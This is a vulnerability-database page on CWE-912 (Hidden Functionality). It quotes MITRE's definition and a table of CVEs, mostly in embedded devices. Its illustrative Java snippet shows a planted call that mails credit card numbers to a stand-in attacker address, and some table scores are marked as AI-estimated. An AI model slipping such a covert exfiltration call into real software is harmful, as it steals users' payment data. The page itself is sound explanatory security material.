CWE-912 Hidden Functionality vulnerability list (69)

A summary of 69 CVE vulnerabilities in the CWE-912 Hidden Functionality weakness class, with AI analysis in Chinese.

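CWE-912 covers hidden-functionality vulnerabilities: software that contains undocumented, out-of-specification functionality that is not easy to notice. Attackers often use these covert entry points to perform unauthorized operations or implant malicious code. Developers should use strict code review, the principle of least privilege, and automated testing to ensure that every function conforms to the design specification and is openly documented, which removes the latent security risk.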

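MITRE CWE official description
CWE: CWE-912 Hidden Functionality
Description: The product contains functionality that is not documented, is not part of the specification, and is not accessible through an interface or command sequence that is obvious to the product's users or administrators.
Hidden functionality can take many forms, such as intentionally malicious code, "Easter Eggs" that contain extra functionality such as games, developer-friendly shortcuts designed to reduce maintenance or support costs (such as hard-coded accounts), and so on. From a security perspective, even when the functionality is not intentionally malicious or damaging, it still increases the product's attack surface and exposes additional weaknesses beyond those exposed by the intended functionality. Even if it is not easily accessible, hidden functionality may still be used in attacks that modify the control flow of the application.
Common consequences (1)
Scope: Other, Integrity. Impact: Varies by Context, Alter Execution Logic
Mitigations (1)
Installation: Always verify the integrity of the product that is being installed.
Code examples (2)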
In the example below, a malicious developer has injected code to send credit card numbers to the developer's own email address.
boolean authorizeCard(String ccn) {
    // Authorize credit card.
    ...
    mailCardNumber(ccn, "evil_developer@evil_domain.com");
}
Bad · Java
Consider a device that comes with various security measures, such as secure boot. The secure-boot process performs firmware-integrity verification at boot time, and this code is stored in a separate SPI-flash device. However, this code contains undocumented "special access features" intended to be used only for performing failure analysis and intended to only be unlocked by the device designer.
Attackers dump the code from the device and then perform reverse engineering to analyze the code. The undocumented, special-access features are identified, and attackers can activate them by sending specific commands via UART before secure-boot phase completes. Using these hidden features, attackers can perform reads and writes to memory via the UART interface. At runtime, the attackers can also execute arbitrary code and dump the entire memory contents.
Bad · Other
| CVE ID | Title | Affected product | CVSS | Severity | Published |
| --- | --- | --- | --- | --- | --- |
| CVE-2026-7413 | Yarbo robot persistent undocumented backdoor access vulnerability | Firmware | 7.2 | High | 2026-05-07 |
| CVE-2026-41446 | Snap One Wattbox trust management issue vulnerability | WattBox 800 | 9.8 | Critical | 2026-04-28 |
| CVE-2026-1952 | Delta Electronics AS320T security vulnerability | AS320T | 9.8 | Critical | 2026-04-24 |
| CVE-2026-4621 | NEC Platforms Aterm Series security vulnerability | Aterm W1200EX(-MS) | 5.3 | - | 2026-03-27 |
| CVE-2026-33280 | BUFFALO Wi-Fi router security vulnerability | BUFFALO Wi-Fi router products | 9.8 | - | 2026-03-27 |
| CVE-2026-31847 | Nexxt Solutions Nebula 300+ security vulnerability | Nebula 300+ | 9.8 | - | 2026-03-23 |
| CVE-2026-3587 | WAGO Lean Managed Switch security vulnerability | Lean Managed Switch 852-1812 | 10.0 | Critical | 2026-03-23 |
| CVE-2025-48418 | Fortinet multiple products security vulnerability | FortiAnalyzer | 6.4 | Medium | 2026-03-10 |
| CVE-2026-1741 | EFM ipTIME A8004T security vulnerability | ipTIME A8004T | 6.6 | Medium | 2026-02-02 |
| CVE-2025-55704 | Brother Industries Brother MFPs security vulnerability | Multiple MFPs | 5.3 | Medium | 2026-01-29 |
| CVE-2025-11544 | Sharp NP series security vulnerability | NP-P627UL, NP-P627ULG, NP-P627UL+, NP-P547UL, NP-P547ULG, NP-P607UL+, NP-CG6600UL, NP-H6271UL, NP-H5471UL, NP-P627ULH, NP-P547ULH, NP-PE455UL, NP-PE455ULG, NP-PE455WL, NP-PE455WLG, NP-PE505XLG, NP-CG6500XL, NP-CG6400UL, NP-CG6400WL, NP-CB4500XL, NP-CA4120X, NP-CA4160W, NP-CA4160X, NP-CA4200U, NP-CA4200W, NP-CA4202W, NP-CA4260X, NP-CA4300X, NP-CA4355X, NP-CD2100U, NP-CD2120X, NP-CD2300X, NP-CR2100X, NP-CR2170W, NP-CR2170X, NP-CR2200U, NP-CR2200W, NP-CR2280X, NP-CR2310X, NP-CR2350X, NP-MC302XG, NP-MC332WG, NP-MC342XG, NP-MC372X, NP-MC372XG, NP-MC382W, NP-MC382WG, NP-MC422XG, NP-ME342UG, NP-ME372W, NP-ME372WG, NP-ME382U, NP-ME382UG, NP-ME402X, NP-ME402XG, NP-P525UL, NP-P525ULG, NP-P525UL+, NP-P525WL, NP-P525WLG, NP-P525WL+, NP-P605UL, NP-P605ULG, NP-P605UL+, NP-CG6500UL, NP-CG6500WL, NP-CB4500UL, NP-CB4500WL, NP-P525ULH, NP-P525WLH, NP-P605ULH, NP-P554U, NP-P554UG, NP-P554U+, NP-P554W, NP-P554WG, NP-P554W+, NP-P474U, NP-P474UG, NP-P474W, NP-P474WG, NP-P604XG, NP-P604X+, NP-P603XG, NP-P523X+, NP-PE523XG, NP-PE523X+, NP-CF6600U, NP-CF6600W, NP-CF6700X, NP-CF6500X, NP-CB4600U, NP-P554UH, NP-P554WH, NP-P474UH, NP-P474WH, NP-P604XH, NP-P603XH, NP-PE523XH, NP-P502HL-2, NP-P502WL-2, NP-P502HLG-2, NP-P502WLG, NP-ME401W, NP-ME361W, NP-ME331W, NP-ME301W, NP-ME401X, NP-ME361X, NP-ME331X, NP-ME301X, NP-ME401WG, NP-ME361WG, NP-ME331WG, NP-ME301WG, NP-ME401XG, NP-ME361XG, NP-ME331XG, NP-ME301XG, NP-CA4155W, NP-CA4350X, NP-CA4255X, NP-CA4155X, NP-CA4115X, NP-MC331WG, NP-MC421XG, NP-MC401XG, NP-MC371XG, NP-MC331XG, NP-MC301XG, NP-CK4155W, NP-CK4255X, NP-CK4155X, NP-CK4055X, NP-CM4150X, NP-CM4050X, NP-CK4155WG, NP-CK4255XG, NP-CK4155XG, NP-CR2165W, NP-CR2305X, NP-CR2275X, NP-CR2165X, NP-CR2155X, NP-CD2115X, NP-CD2105X, NP-CM4151X, NP-CR2276X, NP-CD2116X, NP-P502H, NP-P502W, NP-P452H, NP-P452W | 7.7 (AI) | High (AI) | 2025-12-22 |
| CVE-2025-62773 | Mercku M6a security vulnerability | M6a | 2.4 | Low | 2025-10-22 |
| CVE-2025-58778 | Ruijie RG-EST300 security vulnerability | RG-EST300 | 9.8 (AI) | Critical (AI) | 2025-10-16 |
| CVE-2025-11673 | PiExtract SOOP-CLM security vulnerability | SOOP-CLM | 7.2 | High | 2025-10-13 |
| CVE-2025-55075 | I-O DATA WN-7D36QR security vulnerability | WN-7D36QR | 4.9 | Medium | 2025-09-17 |
| CVE-2025-30064 | CGM CLININET security vulnerability | CGM CLININET | 9.1 (AI) | Critical (AI) | 2025-08-27 |
| CVE-2025-9382 | FNKvision Y215 CCTV Camera security vulnerability | Y215 CCTV Camera | 6.4 | Medium | 2025-08-24 |
| CVE-2010-20103 | ProFTPD security vulnerability | ProFTPD (Professional FTP Daemon) | 9.8 (AI) | Critical (AI) | 2025-08-20 |
| CVE-2025-8938 | TOTOLINK N350R security vulnerability | N350R | 6.3 | Medium | 2025-08-14 |
| CVE-2011-10018 | MyBB security vulnerability | Forum Software | 9.8 (AI) | Critical (AI) | 2025-08-13 |
| CVE-2025-46267 | ELECOM WRC-BE36QS-B and ELECOM WRC-W701-B security vulnerability | WRC-BE36QS-B | 4.9 | Medium | 2025-07-22 |
| CVE-2025-34117 | Netis Netcore Router security vulnerability | Router firmware | 9.8 (AI) | Critical (AI) | 2025-07-16 |
| CVE-2025-6839 | Conjure Position Department Service Quality Evaluation System security vulnerability | Position Department Service Quality Evaluation System | 6.3 | Medium | 2025-06-29 |
| CVE-2025-26412 | SIMCom SIM7600G security vulnerability | SIM7600G Modem | 9.8 (AI) | Critical (AI) | 2025-06-11 |
| CVE-2025-48416 | eCharge Hardy Barth cPH2 and eCharge Hardy Barth cPP2 security vulnerability | cPH2 / cPP2 charging stations | 9.8 (AI) | Critical (AI) | 2025-05-21 |
| CVE-2025-47729 | TeleMessage archiving backend security vulnerability | archiving backend | 1.9 | Low | 2025-05-08 |
| CVE-2025-32370 | Kentico Xperience security vulnerability | Xperience | 7.2 | High | 2025-04-06 |
| CVE-2025-2894 | Unitree Go 1 security vulnerability | Go1 | 6.6 | Medium | 2025-03-28 |
| CVE-2025-27840 | Espressif ESP32 security vulnerability | ESP32 | 6.8 | Medium | 2025-03-08 |
| CVE-2025-1204 | Contec Health CMS8000 Patient Monitor security vulnerability | CMS8000 Patient Monitor | 7.7 | - | 2025-02-25 |

CWE-912 (Hidden Functionality) is a common weakness category; this platform lists 69 CVE vulnerabilities associated with it.